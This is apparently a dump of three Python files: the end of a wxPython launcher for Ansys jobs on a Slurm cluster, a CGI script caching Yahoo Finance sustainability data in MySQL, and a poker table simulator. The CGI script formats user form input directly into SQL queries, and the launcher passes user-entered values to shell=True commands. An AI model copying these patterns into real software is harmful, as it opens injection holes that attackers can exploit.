self.bar_level = level
self.bar_color = wx.WHITE
# start a thread to update status bar
self.worker = FlashStatusBarThread(self)
self.worker.start()
@staticmethod
def ensure_app_folder():
"""Create a path for .aedt folder if first run
Returns
str
Path to application directory.
"""
user_dir = os.path.expanduser("~")
app_dir = os.path.join(user_dir, ".aedt")
if not os.path.exists(app_dir):
try:
os.makedirs(app_dir)
except OSError as exc: # Guard against race condition
if exc.errno != errno.EEXIST:
raise
return app_dir
def on_signal(self, *args):
"""Update UI when signal comes from subthread. Should be updated always from main thread."""
# run in list to keep order
for i, queue_name in enumerate(queue_dict):
self.load_grid.SetCellValue(i, 0, str(queue_dict[queue_name]["avail_cores"]))
self.load_grid.SetCellValue(i, 1, str(queue_dict[queue_name]["used_cores"]))
self.load_grid.SetCellValue(i, 2, str(queue_dict[queue_name]["reserved_cores"]))
self.load_grid.SetCellValue(i, 3, str(queue_dict[queue_name]["failed_cores"]))
self.load_grid.SetCellValue(i, 4, str(queue_dict[queue_name]["total_cores"]))
def read_custom_builds(self):
"""Reads all specified in JSON file custom builds."""
if os.path.isfile(self.user_build_json):
try:
with open(self.user_build_json) as file:
self.builds_data = json.load(file)
except json.decoder.JSONDecodeError:
print("JSON file with user builds is corrupted")
os.remove(self.user_build_json)
return
for bld_version, bld_path in self.builds_data.items():
prod_list_path = os.path.join(bld_path, "config", "ProductList.txt")
if not os.path.isfile(prod_list_path):
print(f"Product is not available. Please check {bld_path}")
continue
self.user_build_viewlist.AppendItem([bld_version, bld_path])
install_dir[bld_version] = bld_path
with open(prod_list_path) as file:
self.products[bld_version] = next(file).rstrip() # get first line
# update values in version selector on 1st page
init_combobox(install_dir.keys(), self.m_select_version1, default_version)
def write_custom_build(self):
"""Create a user JSON file with custom builds and to update selector."""
num_rows = self.user_build_viewlist.GetItemCount()
self.builds_data = {}
for i in range(num_rows):
self.builds_data[self.user_build_viewlist.GetTextValue(i, 0)] = self.user_build_viewlist.GetTextValue(i, 1)
# update values in version selector on 1st page
init_combobox(install_dir.keys(), self.m_select_version1, default_version)
with open(self.user_build_json, "w") as file:
json.dump(self.builds_data, file, indent=4)
def settings_save(self, *args):
"""Take all values from the UI and dump them to the .json file."""
self.default_settings = {
"version": __version__,
"queue": self.queue_dropmenu.GetValue(),
"allocation": self.m_alloc_dropmenu.GetValue(),
"num_cores": self.m_numcore.Value,
"aedt_version": self.m_select_version1.Value,
"env_var": self.env_var_text.Value,
"use_node_list": self.m_nodes_list_checkbox.Value,
"node_list": self.m_nodes_list.Value,
"project_path": self.path_textbox.Value,
"use_reservation": self.m_reserved_checkbox.Value,
"reservation_id": self.reservation_id_text.Value,
}
with open(self.default_settings_json, "w") as file:
json.dump(self.default_settings, file, indent=4)
def settings_load(self):
"""Read settings file and populate UI with values."""
with open(self.default_settings_json, "r") as file:
self.default_settings = json.load(file)
try:
if self.default_settings["queue"] not in queue_config_dict:
# if queue was deleted from cluster
self.default_settings["queue"] = default_queue
self.queue_dropmenu.Value = self.default_settings["queue"]
self.m_numcore.Value = self.default_settings["num_cores"]
self.m_select_version1.Value = self.default_settings["aedt_version"]
self.env_var_text.Value = self.default_settings["env_var"]
self.m_nodes_list.Value = self.default_settings.get("node_list", "")
self.m_nodes_list_checkbox.Value = self.default_settings.get("use_node_list", False)
self.path_textbox.Value = self.default_settings["project_path"]
self.m_reserved_checkbox.Value = self.default_settings["use_reservation"]
self.reservation_id_text.Value = self.default_settings["reservation_id"]
queue_value = self.queue_dropmenu.GetValue()
self.m_node_label.LabelText = self.construct_node_specs_str(queue_value)
except wx._core.wxAssertionError:
add_message(
"UI was updated or default settings file was corrupted. Please save default settings again", "", "i"
)
@staticmethod
def construct_node_specs_str(queue):
"""Construct node description string from cluster configuration data
Parameters
queue
Queue for which we need a node description
Returns
-------
str
Human readable string for the UI with number of cores and
RAM per node.
"""
node_str = f"({queue_config_dict[queue]['cores']} Cores, {queue_config_dict[queue]['ram']}GB RAM per node)"
return node_str
def settings_reset(self, *args):
"""Remove settings previously set by user.
Fired on click to reset to factory.
"""
if os.path.isfile(self.default_settings_json):
os.remove(self.default_settings_json)
add_message("To complete resetting please close and start again the application", "", "i")
def timer_stop(self):
self.running = False
def evt_num_cores_nodes_change(self, *args):
try:
num_cores = num_nodes = int(self.m_numcore.Value or 0)
except ValueError:
self.add_status_msg("Nodes Value must be integer", level="!")
self.m_numcore.Value = str(1)
return
if num_cores < 0:
self.m_numcore.Value = str(1)
return
cores_per_node = queue_config_dict[self.queue_dropmenu.Value]["cores"]
ram_per_node = queue_config_dict[self.queue_dropmenu.Value]["ram"]
if self.m_alloc_dropmenu.GetCurrentSelection() == 0:
if num_cores > cores_per_node:
self.m_numcore.Value = str(cores_per_node)
# todo add status message
summary_msg = f"You request {self.m_numcore.Value} Cores and {ram_per_node}GB of shared RAM"
else:
total_cores = cores_per_node * num_nodes
total_ram = ram_per_node * num_nodes
summary_msg = f"You request {total_cores} Cores and {total_ram}GB RAM"
self.m_summary_caption.LabelText = summary_msg
def evt_select_allocation(self, *args):
"""Callback when user changes allocation strategy."""
if self.m_alloc_dropmenu.GetCurrentSelection() == 0:
self.m_num_cores_caption.LabelText = "# Cores"
else:
self.m_num_cores_caption.LabelText = "# Nodes"
def select_mode(self, *args):
"""Callback invoked on change of the mode Pre/Post or Interactive.
Grey out options that are not applicable for Pre/Post.
"""
sel = self.submit_mode_radiobox.Selection
if sel == 3:
enable = True
self.m_nodes_list.Show(self.m_nodes_list_checkbox.Value) # required for proper rendering
else:
enable = False
self.m_nodes_list_checkbox.Value = False
self.m_reserved_checkbox.Value = False
self.reservation_id_text.Show(enable)
self.m_nodes_list.Show(enable)
self.m_summary_caption.Show(enable)
self.queue_dropmenu.Show(enable)
self.m_numcore.Show(enable)
self.m_node_label.Show(enable)
self.m_nodes_list_checkbox.Show(enable)
self.m_alloc_dropmenu.Show(enable)
self.m_num_cores_caption.Show(enable)
self.m_alloc_caption.Show(enable)
self.m_queue_caption.Show(enable)
self.m_specify_nodes_caption.Show(enable)
# todo remove if find a way to run reservation for Slurm batch
self.m_reserved_checkbox.Show(enable)
self.m_reservation_caption.Show(enable)
# self.m_alloc_dropmenu.Enable(enable) # todo enable if Slurm will support non-exclusive
self.evt_select_allocation()
self.evt_num_cores_nodes_change()
def update_job_status(self, *args):
"""Event is called to update a viewlist with current running jobs from main thread (thread safety)."""
self.qstat_viewlist.DeleteAllItems()
for q_dict in qstat_list:
self.qstat_viewlist.AppendItem(
[
q_dict["pid"],
q_dict["state"],
q_dict["name"],
q_dict["user"],
q_dict["queue_data"],
q_dict["proc"],
q_dict["started"],
]
)
def update_msg_list(self):
"""Update messages on checkbox and init from file"""
self.scheduler_msg_viewlist.DeleteAllItems()
for msg in self.log_data["Message List"]:
sched = msg[3]
if sched or self.m_checkBox_allmsg.Value:
tab_data = msg[0:3]
self.scheduler_msg_viewlist.PrependItem(tab_data)
def add_log_entry(self, *args):
"""Add new entry to the Scheduler Messages Window."""
scheduler = log_dict.get("scheduler", True)
timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
message = wordwrap(log_dict["msg"], 600, wx.ClientDC(self))
data = [timestamp, log_dict.get("pid", "0"), message, scheduler]
if scheduler or self.m_checkBox_allmsg.Value:
tab_data = data[0:3]
self.scheduler_msg_viewlist.PrependItem(tab_data)
self.log_data["Message List"].append(data)
with open(self.logfile, "w") as fa:
json.dump(self.log_data, fa, indent=4)
def rmb_on_scheduler_msg_list(self, *args):
"""When clicking RMB on the scheduler message list it will
propose a context menu with choice to delete all messages.
"""
position = wx.ContextMenuEvent(type=wx.wxEVT_NULL)
self.PopupMenu(ClearMsgPopupMenu(self), position.GetPosition())
def leftclick_processtable(self, *args):
"""On double click on process row will propose to abort running job"""
self.cancel_job()
def cancel_job(self):
"""
Send Slurm scancel command
:return:
"""
row = self.qstat_viewlist.GetSelectedRow()
pid = self.qstat_viewlist.GetTextValue(row, 0)
result = add_message("Abort Queue Process {}?\n".format(pid), "Confirm Abort", "?")
if result == wx.ID_OK:
command = f"scancel {pid}"
subprocess.call(command, shell=True)
print(f"Job cancelled via: {command}")
msg = "Job {} cancelled from GUI".format(pid)
try:
self.log_data["PID List"].remove(pid)
except ValueError:
pass
log_dict["pid"] = pid
log_dict["msg"] = msg
log_dict["scheduler"] = False
self.add_log_entry()
def select_queue(self, *args):
"""Called when user selects a value in Queue drop down menu.
Also called during __init__ to fill the UI. Sets PE and
number of cores for each queue.
"""
queue_value = self.queue_dropmenu.GetValue()
self.m_node_label.LabelText = self.construct_node_specs_str(queue_value)
self.evt_num_cores_nodes_change()
def evt_node_list_check(self, *args):
"""Callback called when clicked "Specify node list" options.
Hides/Shows input field for node list.
"""
if self.m_nodes_list_checkbox.Value:
self.m_nodes_list.Show()
else:
self.m_nodes_list.Hide()
def on_reserve_check(self, *args):
"""Callback called when clicked Reservation.
Will Hide/Show input field for reservation ID.
"""
if self.m_reserved_checkbox.Value:
self.reservation_id_text.Show()
else:
self.reservation_id_text.Hide()
def submit_overwatch_thread(self, *args):
"""Opens OverWatch on button click"""
if not os.path.isfile(FIREFOX):
add_message("Firefox is not installed on the cluster", title="Error", icon="!")
return
threading.Thread(target=self.open_overwatch, daemon=True).start()
def check_display_var(self):
"""Validate that DISPLAY variable follow convention hostname:display_number
Returns
-------
str
Proper display value
"""
display_var = os.getenv("DISPLAY", "")
if not display_var:
msg = "DISPLAY environment variable is not specified. Contact cluster admin"
add_message(msg, "Environment error", icon="!")
raise EnvironmentError(msg)
if ":" not in display_var:
msg = "DISPLAY hasn't session number specified. Contact cluster admin"
add_message(msg, "Environment error", icon="!")
raise EnvironmentError(msg)
if not display_var.split(":")[0]:
return f"{self.hostname}:{display_var.split(':')[1]}"
return display_var
def click_launch(self, *args):
"""Depending on the choice of the user invokes AEDT on visual node or simply for pre/post"""
check_ssh()
aedt_version = self.m_select_version1.Value
aedt_path = install_dir[aedt_version]
env = ""
if self.env_var_text.Value:
env += "" + self.env_var_text.Value
if admin_env_vars:
env_list = [f"{env_var}={env_val}" for env_var, env_val in admin_env_vars.items()]
env += "," + ",".join(env_list)
# verify that no double commas, spaces, etc
if env:
env = re.sub(" ", "", env)
env = re.sub(",+", ",", env)
env = env.rstrip(",").lstrip(",")
reservation, reservation_id = self.check_reservation()
if reservation and not reservation_id:
return
try:
self.update_registry(aedt_path)
except FileNotFoundError:
add_message("Verify project directory. Probably user name was changed", "Wrong project path", "!")
return
op_mode = self.submit_mode_radiobox.GetSelection()
job_type = {0: "pre-post", 1: "monitor", 2: "submit", 3: "interactive"}
try:
self.send_statistics(aedt_version, job_type[op_mode])
except Exception:
# not worry a lot
print("Error sending statistics")
if op_mode == 3:
self.submit_interactive_job(aedt_path, env, reservation, reservation_id)
else:
env = env[4:] # remove ALL, from env vars
command_key = ""
if op_mode == 1:
command_key = "-showsubmitjob"
elif op_mode == 2:
command_key = "-showmonitorjob"
threading.Thread(
target=self._submit_batch_thread,
daemon=True,
args=(
aedt_path,
env,
command_key,
),
).start()
def submit_interactive_job(self, aedt_path, env, reservation, reservation_id):
"""
Submit interactive job
:param aedt_path:
:param env:
:param reservation:
:param reservation_id:
:return: None
"""
scheduler = "sbatch"
allocation_rule = self.m_alloc_dropmenu.GetCurrentSelection()
if int(self.m_numcore.Value or 0) < 1:
self.add_status_msg("Nodes Value must be a positive integer", level="!")
return
num_nodes = num_cores = int(self.m_numcore.Value)
queue = self.queue_dropmenu.Value
# interactive submission
env += f",DISPLAY={self.display_node}"
command = [scheduler, "--job-name", "aedt", "--partition", queue, "--export", env]
if allocation_rule == 0:
# 1 node and cores
command += ["--nodes", "1-1", "--ntasks", str(num_cores)]
total_cores = num_cores
else:
cores_per_node = queue_config_dict[queue]["cores"]
total_cores = cores_per_node * num_nodes
command += ["--nodes", f"{num_nodes}-{num_nodes}", "--ntasks", str(total_cores)]
nodes_list_str = self.m_nodes_list.Value
nodes_list_str = nodes_list_str.replace(" ", "")
if self.m_nodes_list_checkbox.Value and nodes_list_str:
command += ["--nodelist", nodes_list_str]
if reservation:
command += ["--reservation", reservation_id]
aedt_str = " ".join([os.path.join(aedt_path, "ansysedt"), "-machinelist", f"num={total_cores}"])
command += ["--wrap", f'"{aedt_str}"']
command = " ".join(command) # convert to string to avoid escaping characters
print(f"Execute via: {command}")
try:
output = subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True, universal_newlines=True)
except subprocess.CalledProcessError as exc:
msg = exc.output
log_dict["scheduler"] = True
else:
msg = f"Job submitted to {queue}\nSubmit Command:{command}"
pid = output.strip().split()[-1]
log_dict["scheduler"] = False
log_dict["pid"] = pid
self.log_data["PID List"].append(pid)
log_dict["msg"] = msg
self.add_log_entry()
def check_reservation(self):
"""Validate if user wants to run with predefined reservation.
Create a reservation argument for interactive mode or create
.sge_request file with argument for non graphical
Returns
-------
bool
``True`` if reservation was checked AND reservation ID if the
value is correct.
str
Reservation ID.
"""
reservation = self.m_reserved_checkbox.Value
ar = ""
if reservation:
ar = self.reservation_id_text.Value
if ar in [None, ""]:
add_message(
"Reservation ID is not provided. Please set ID and click launch again", "Reservation ID", "!"
)
return reservation, ar
def send_statistics(self, version, job_type):
"""Send usage statistics to the database.
Parameters
----------
version : str
Version of EDT used.
job_type : str
Interactive or non-graphical job type.
"""
if DEBUG_MODE:
return
client = InfluxDBClient(host=STATISTICS_SERVER, port=STATISTICS_PORT)
db_name = "aedt_hpc_launcher"
client.switch_database(db_name)
time_now = datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%SZ")
json_body = [
{
"measurement": db_name,
"tags": {
"username": self.username,
"version": version,
"job_type": job_type,
"cluster": self.hostname[:3],
},
"time": time_now,
"fields": {"count": 1},
}
]
client.write_points(json_body)
def update_registry(self, aedt_path):
"""Set registry for each run of EDT.
This is necessary because each run occurs on a different Linux node.
Disables:
1. Question on product improvement
2. Question on Project directory, this is grabbed from UI
3. Welcome message
4. Question on personal lib
Sets:
1. EDT Installation path
2. Slurm scheduler as default
aedt_path : str
Path to the installation directory of EDT.
"""
if not os.path.isdir(self.path_textbox.Value):
os.mkdir(self.path_textbox.Value)
commands = [] # list to aggregate all commands to execute
registry_file = os.path.join(aedt_path, "UpdateRegistry")
# set base for each command: path to registry, product and level
command_base = [
registry_file,
"-Set",
"-ProductName",
self.products[self.m_select_version1.Value],
"-RegistryLevel",
"user",
]
# disable question about participation in product improvement
commands.append(
["-RegistryKey", "Desktop/Settings/ProjectOptions/ProductImprovementOptStatus", "-RegistryValue", "1"]
)
# set installation path
commands.append(["-RegistryKey", "Desktop/InstallationDirectory", "-RegistryValue", aedt_path])
# set project folder
commands.append(["-RegistryKey", "Desktop/ProjectDirectory", "-RegistryValue", self.path_textbox.Value])
# disable welcome message
commands.append(["-RegistryKey", "Desktop/Settings/ProjectOptions/ShowWelcomeMsg", "-RegistryValue", "0"])
# set personal lib
personal_lib = os.path.join(os.environ["HOME"], "Ansoft", "Personallib")
commands.append(["-RegistryKey", "Desktop/PersonalLib", "-RegistryValue", personal_lib])
# set Slurm scheduler
settings_areg = os.path.join(os.path.dirname(os.path.realpath(__file__)), "slurm_settings.areg")
commands.append(["-FromFile", settings_areg])
for command in commands:
subprocess.call(command_base + command)
def m_update_msg_list(self, *args):
"""Fired when user clicks 'Show all messages' for Scheduler messages window"""
self.update_msg_list()
def delete_row(self, *args):
"""By clicking on Delete Row button delete row and rewrite json file with builds"""
row = self.user_build_viewlist.GetSelectedRow()
if row != -1:
self.user_build_viewlist.DeleteItem(row)
self.write_custom_build()
def add_new_build(self, *args):
"""By click on Add New Build opens file dialogue to select path and input box to set name.
At the end we update JSON file with custom builds"""
get_dir_dialogue = wx.DirDialog(
None, "Choose a Linux64 directory:", style=wx.DD_DEFAULT_STYLE | wx.DD_DIR_MUST_EXIST
)
if get_dir_dialogue.ShowModal() == wx.ID_OK:
path = get_dir_dialogue.GetPath()
get_dir_dialogue.Destroy()
else:
get_dir_dialogue.Destroy()
return
if "Linux64" not in path[-7:]:
add_message(
"Your path should include and be ended by Linux64 (eg /ott/apps/ANSYSEM/Linux64)", "Wrong path", "!"
)
return
get_name_dialogue = wx.TextEntryDialog(None, "Set name of a build:", value="AEDT_2019R3")
if get_name_dialogue.ShowModal() == wx.ID_OK:
name = get_name_dialogue.GetValue()
get_name_dialogue.Destroy()
else:
get_name_dialogue.Destroy()
return
if name in [None, ""] + list(self.builds_data.keys()):
add_message("Name cannot be empty and not unique", "Wrong name", "!")
return
# if all is fine add new build
self.user_build_viewlist.AppendItem([name, path])
install_dir[name] = path
with open(os.path.join(path, "config", "ProductList.txt")) as file:
self.products[name] = next(file).rstrip() # get first line
self.write_custom_build()
def set_project_path(self, *args):
"""Invoked when clicked on "..." set_path_button.
Creates a dialogue where user can select directory.
"""
get_dir_dialogue = wx.DirDialog(None, "Choose directory:", style=wx.DD_DEFAULT_STYLE)
if get_dir_dialogue.ShowModal() == wx.ID_OK:
path = get_dir_dialogue.GetPath()
get_dir_dialogue.Destroy()
else:
get_dir_dialogue.Destroy()
return
self.path_textbox.Value = path
def shutdown_app(self, *args):
"""Exit from app by clicking X or Close button.
Kill the process to kill all child threads.
"""
self.timer_stop()
lock_file = os.path.join(self.app_dir, "ui.lock")
try:
os.remove(lock_file)
except FileNotFoundError:
pass
while len(threading.enumerate()) > 1: # possible solution to wait until all threads are dead
time.sleep(0.25)
signal.pthread_kill(threading.get_ident(), signal.SIGINT)
os.kill(os.getpid(), signal.SIGINT)
def open_overwatch(self):
"""Open Overwatch with java."""
command = [FIREFOX, f"{overwatch_url}/users/{self.username}"]
subprocess.call(command)
@staticmethod
def _submit_batch_thread(aedt_path, env, command_key):
"""Start EDT in pre/post mode.
Parameters
----------
aedt_path : str
Path to the EDT root.
env : str
String with list of environment variables.
command_key :
Add key to open Submit or Monitor Job dialog.
"""
env_vars = os.environ.copy()
if env:
for var_value in env.split(","):
variable, value = var_value.split("=")
env_vars[variable] = value
command = [os.path.join(aedt_path, "ansysedt"), command_key]
print("Electronics Desktop is started via:", subprocess.list2cmdline(command))
subprocess.Popen(command, env=env_vars)
def check_ssh():
"""Verify that all passwordless SSH are in place."""
ssh_path = os.path.join(os.environ["HOME"], ".ssh")
for file in ["authorized_keys", "config"]:
if not os.path.isfile(os.path.join(ssh_path, file)):
if os.path.isdir(ssh_path):
shutil.rmtree(ssh_path)
proc = subprocess.Popen([path_to_ssh], stdin=subprocess.PIPE, shell=True)
proc.communicate(input=b"\n\n\n")
break
def add_message(message, title="", icon="?"):
"""Create a dialog with different set of buttons.
Parameters
----------
message : str
Message you want to show.
title : str, optional
Message window title.
icon : str, optional
Depending on the input will create either question dialogue
(?), error (!) or just an information dialog.
Returns
-------
int
Response from the user (for example, wx.OK).
"""
if icon == "?":
icon = wx.OK | wx.CANCEL | wx.ICON_QUESTION
elif icon == "!":
icon = wx.OK | wx.ICON_ERROR
else:
icon = wx.OK | wx.ICON_INFORMATION
dlg_qdel = wx.MessageDialog(None, message, title, icon)
result = dlg_qdel.ShowModal()
dlg_qdel.Destroy()
return result
def init_combobox(entry_list, combobox, default_value=""):
"""Fills a wx.Combobox element with the entries in a list.
Parameters
----------
entry_list : list
List of text entries to appear in the combobox element.
combobox : wx.Combobox
object pointing to the combobox element
default_value : str, optional
Default value (must be present in the entry list, otherwise
will be ignored)
"""
combobox.Clear()
index = 0
for i, value in enumerate(list(entry_list)):
if value == default_value:
index = i
combobox.Append(value)
combobox.SetSelection(index)
def main():
"""Main function to generate UI.
Validate that only one instance is opened.
"""
# this 0.7 sleep prevents double open if user has single click launch in Linux and performs double click
time.sleep(0.7)
app = wx.App()
lock_file = os.path.join(LauncherWindow.ensure_app_folder(), "ui.lock")
if os.path.exists(lock_file):
result = add_message(
(
"Application was not properly closed or you have multiple instances opened. "
"Do you really want to open new instance?"
),
"Instance error",
"?",
)
if result != wx.ID_OK:
return
else:
with open(lock_file, "w") as file:
file.write("1")
ex = LauncherWindow(None)
ex.Show()
app.MainLoop()
if __name__ == "__main__":
main()
|
index.py
|
#!/usr/bin/python3
import cgi
import mysql.connector
from datetime import datetime, timedelta
from threading import Thread
import json
import yfinance as yf
def commit(ticker_symbol, results, cursor, cnx):
sql1 = "DELETE FROM yahoofinancessustainable WHERE ticker='{}';".format(ticker_symbol)
sql2 = "INSERT INTO yahoofinancessustainable VALUES('{}', '{}', '{}');".format(
ticker_symbol,
results,
str(datetime.now()))
cursor.execute(sql1)
cnx.commit()
cursor.execute(sql2)
cnx.commit()
cursor.close()
cnx.close()
def expected(dump):
return True
def site(ticker_symbol):
stock = yf.Ticker(ticker_symbol)
sus = stock.sustainability
try:
c1 = list(sus.index.values)
c2 = list(sus['Value'].values)
output = {}
for i in range(len(c1)):
output[c1[i]] = c2[i]
except:
output = {'gmo': 'Not Available', 'coal': 'Not Available', 'adult': 'Not Available', 'nuclear': 'Not Available', 'palmOil': 'Not Available', 'tobacco': 'Not Available', 'catholic': 'Not Available', 'gambling': 'Not Available', 'totalEsg': 'Not Available', 'alcoholic': 'Not Available', 'peerCount': 'Not Available', 'peerGroup': 'Not Available', 'smallArms': 'Not Available', 'furLeather': 'Not Available', 'percentile': 'Not Available', 'pesticides': 'Not Available', 'socialScore': 'Not Available', 'animalTesting': 'Not Available', 'esgPerformance': 'Not Available', 'governanceScore': 'Not Available', 'environmentScore': 'Not Available', 'militaryContract': 'Not Available', 'socialPercentile': 'Not Available', 'highestControversy': 'Not Available', 'controversialWeapons': 'Not Available', 'governancePercentile': 'Not Available', 'environmentPercentile': 'Not Available'}
return json.dumps({'results':output})
def main():
form = cgi.FieldStorage()
ticker_symbol = str(form['ticker_symbol'].value).upper()
cnx = mysql.connector.connect(user='api', database='projectapi')
cursor = cnx.cursor(buffered=True)
sql = "SELECT * FROM yahoofinancessustainable WHERE ticker='{}';".format(ticker_symbol)
cursor.execute(sql)
cache_results = ''
cache_expired = False
fetch_results = ''
results = ''
try:
data = list(cursor.fetchall()[0])
if (datetime.now()-timedelta(days=30)) > data[2]:
raise IndexError('item in database expired')
cache_results = json.loads(data[1])
cursor.close()
cnx.close()
except:
cache_expired = True
fetch_results = site(ticker_symbol)
finally:
if not cache_expired:
results = cache_results
elif expected(fetch_results):
t1 = Thread(target=commit, args=(ticker_symbol, fetch_results, cursor, cnx,))
t1.start()
results = fetch_results
elif cache_expired:
results = cache_results
else:
results = json.dumps({'error':'api access problem'})
return results
if __name__ == '__main__':
print('Content-type:application/json', end='\r\n\r\n')
print(main().encode(encoding='UTF-8',errors='ignore').decode(), end='')
|
table.py
|
import time
import uuid
from threading import Thread, Lock
from deuces.deuces import Card, Deck, Evaluator
from .player import Player
class Table(object):
BLIND_INCREMENTS = [[10,25],[25,50],[50,100],[75,150],[100,200],[150,300],[200,400],[300,600],[400,800],[500,10000],[600,1200],[800,1600],[1000,2000]]
def __init__(self, instance_num, seats = 8, quiet = False, training = False):
self.instance_num = instance_num
self._blind_index = 0
[self._smallblind, self._bigblind] = Table.BLIND_INCREMENTS[0]
self._deck = Deck()
self._evaluator = Evaluator()
self.community = []
self._round = 0
self._button = 0
self._discard = []
self._side_pots = [0]*seats
self._current_sidepot = 0 # index of _side_pots
self._totalpot = 0
self._tocall = 0
self._lastraise = 0
self._number_of_hands = 0
# fill seats with dummy players
self._seats = [Player(-1,-1,0,'empty',0,True) for _ in range(seats)]
self.emptyseats = seats
self._player_dict = {}
self._quiet = quiet
self._training = training
self._run_thread = Thread(target = self.run, args=())
self._run_thread.daemon = True
def start(self):
self._run_thread.start()
def run(self):
self.run_game()
def run_game(self):
#print("running game", self.instance_num)
self.ready_players()
# for p in self._seats:
# print('Player ',p.playerID, ' playing hand: ', p.playing_hand, 'sitting out', p.sitting_out)
players = [player for player in self._seats if not player.emptyplayer and not player.sitting_out]
self._number_of_hands = 1
# start hand if table full
# if len(players) == len(self._seats):
[self._smallblind, self._bigblind] = Table.BLIND_INCREMENTS[0]
# keep playing until there's a single player (shotgun style)
place = 1
while(self.emptyseats < len(self._seats)-1):
# answer = input('Press [enter] to start a game:')
# if not answer:
if not self._quiet:
print('Starting game number: ', self._number_of_hands)
for p in self._seats:
if p.playing_hand:
print('Player ',p.playerID, ' stack size: ', p.stack)
self.start_hand(players)
self._number_of_hands += 1
#print("players left", len([p for p in players if p.playing_hand]))
# increment blinds every 15 hands (based on avg hands/hour of 30)
if (self._number_of_hands % 15) == 0 and self._number_of_hands < 60:
self.increment_blinds()
if len([p for p in players if p.playing_hand]) == 1:
#print("winner found!")
winner = [p for p in players if p.playing_hand][0]
if winner.get_ai_type() == 0:
place = 1
else:
place = 2
break
else:
found = False
for p in players:
if p.get_ai_type() == 0 and p.playing_hand:
found = True
break
if not found:
player_left = 0
for p in players:
if p.playing_hand == True:
player_left += 1
place = player_left + 1
break
if self._number_of_hands == 200:
print('no winner in 200 hands')
break
return place
def start_hand(self, players):
players = [p for p in players if p.playing_hand]
assert sum([p.stack for p in players]) == 2000*len(self._seats)
self.new_round()
self._round=0
player = self._first_to_act(players)
self.post_smallblind(player)
player = self._next(players, player)
self.post_bigblind(player)
player = self._next(players, player)
self._tocall = self._bigblind
# rounds
self._round = 0
while self._round<4 and len(players)>1:
if self._round == 0:
self.deal()
elif self._round == 1:
self.flop()
elif self._round == 2:
self.turn()
elif self._round ==3:
self.river()
#print("round", self._round)
folded_players = []
while not player.playedthisround and len([p for p in players if not p.isallin]) >=1:
if player.isallin:
# print('player ', player.playerID, 'is all in, skipping their turn')
player = self._next(players, player)
continue
# print('requesting move from ',player.playerID)
#print("before", player.hand)
move = player.player_move(self.output_state(player))
if move[0] == 'call':
self.player_bet(player, self._tocall)
if not self._quiet:
print('Player', player.playerID, move)
player = self._next(players, player)
elif move[0] == 'check':
self.player_bet(player, player.currentbet)
if not self._quiet:
print('Player', player.playerID, move)
player = self._next(players, player)
elif move[0] == 'raise':
self.player_bet(player, move[1]+player.currentbet)
if not self._quiet:
print('Player', player.playerID, move)
for p in players:
if p != player:
p.playedthisround = False
player = self._next(players, player)
elif move[0] == 'fold':
player.playing_hand = False
folded_player = player
if not self._quiet:
print('Player', player.playerID, move)
player = self._next(players, player)
players.remove(folded_player)
folded_players.append(folded_player)
# break if a single player left
if len(players) ==1:
break
player = self._first_to_act(players)
self.resolve_sidepots(players + folded_players)
self.new_round()
if not self._quiet:
print('totalpot', self._totalpot)
assert sum([p.stack for p in self._seats]) + self._totalpot == 2000*len(self._seats)
self.resolve_game(players)
self.reset()
def increment_blinds(self):
self._blind_index = min(self._blind_index+1,len(Table.BLIND_INCREMENTS)-1)
[self._smallblind, self._bigblind] = Table.BLIND_INCREMENTS[self._blind_index]
def post_smallblind(self, player):
if not self._quiet:
print('player ', player.playerID, 'small blind', self._smallblind)
self.player_bet(player, self._smallblind)
player.playedthisround = False
def post_bigblind(self, player):
if not self._quiet:
print('player ', player.playerID, 'big blind', self._bigblind)
self.player_bet(player, self._bigblind)
player.playedthisround = False
self._lastraise = self._bigblind
def player_bet(self, player, total_bet):
# relative_bet is how much _additional_ money is the player betting this turn, on top of what they have already contributed
# total_bet is the total contribution by player to pot in this round
relative_bet = min(player.stack, total_bet - player.currentbet)
player.bet(relative_bet + player.currentbet)
self._totalpot += relative_bet
self._tocall = max(self._tocall, total_bet)
if self._tocall >0:
self._tocall = max(self._tocall, self._bigblind)
self._lastraise = max(self._lastraise, relative_bet - self._lastraise)
def _first_to_act(self, players):
if self._round == 0 and len(players) == 2:
return self._next(sorted(players + [self._seats[self._button]], key=lambda x:x.get_seat()), self._seats[self._button])
try:
first = [player for player in players if player.get_seat() > self._button][0]
except IndexError:
first = players[0]
return first
def _next(self, players, current_player):
idx = players.index(current_player)
return players[(idx+1) % len(players)]
def deal(self):
for player in self._seats:
if player.playing_hand:
player.hand = self._deck.draw(2)
def flop(self):
self._discard.append(self._deck.draw(1)) #burn
self.community = self._deck.draw(3)
def turn(self):
self._discard.append(self._deck.draw(1)) #burn
self.community.append(self._deck.draw(1))
def river(self):
self._discard.append(self._deck.draw(1)) #burn
self.community.append(self._deck.draw(1))
def add_player(self, playerID, emptyplayer = False, ai_flag = False, ai_type = -1, weights = None, biases = None, stack = 2000):
if playerID not in self._player_dict:
new_player = Player(playerID, emptyplayer, ai_flag, ai_type, weights, biases, stack)
for i,player in enumerate(self._seats):
if player.emptyplayer:
self._seats[i] = new_player
new_player.set_seat(i)
break
self._player_dict[playerID] = new_player
self.emptyseats -= 1
def ready_players(self):
'''
if len([p for p in self._seats if not p.emptyplayer and p.sitting_out]) == len(self._seats):
for p in self._seats:
if not p.emptyplayer:
p.sitting_out = False
p.playing_hand = True
'''
for p in self._seats:
p.sitting_out = False
p.playing_hand = True
#print("Players READY")
def remove_player(self, playerID):
try:
idx = self._seats.index(self._player_dict[playerID])
self._seats[idx] = Player(-1,-1,0,'empty',0,True)
del self._player_dict[playerID]
self.emptyseats += 1
except ValueError:
pass
def resolve_sidepots(self, players_playing):
players = [p for p in players_playing if p.currentbet]
if not self._quiet:
print('current bets: ', [p.currentbet for p in players])
print('playing hand: ', [p.playing_hand for p in players])
if not players:
return
try:
smallest_bet = min([p.currentbet for p in players if p.playing_hand])
except ValueError:
for p in players:
self._side_pots[self._current_sidepot] += p.currentbet
p.currentbet = 0
return
smallest_players_allin = [p for p,bet in zip(players, [p.currentbet for p in players]) if bet == smallest_bet and p.isallin]
for p in players:
self._side_pots[self._current_sidepot] += min(smallest_bet, p.currentbet)
p.currentbet -= min(smallest_bet, p.currentbet)
p.lastsidepot = self._current_sidepot
if smallest_players_allin:
self._current_sidepot += 1
self.resolve_sidepots(players)
if not self._quiet:
print('sidepots: ', self._side_pots)
def new_round(self):
for player in self._player_dict.values():
player.currentbet = 0
player.playedthisround = False
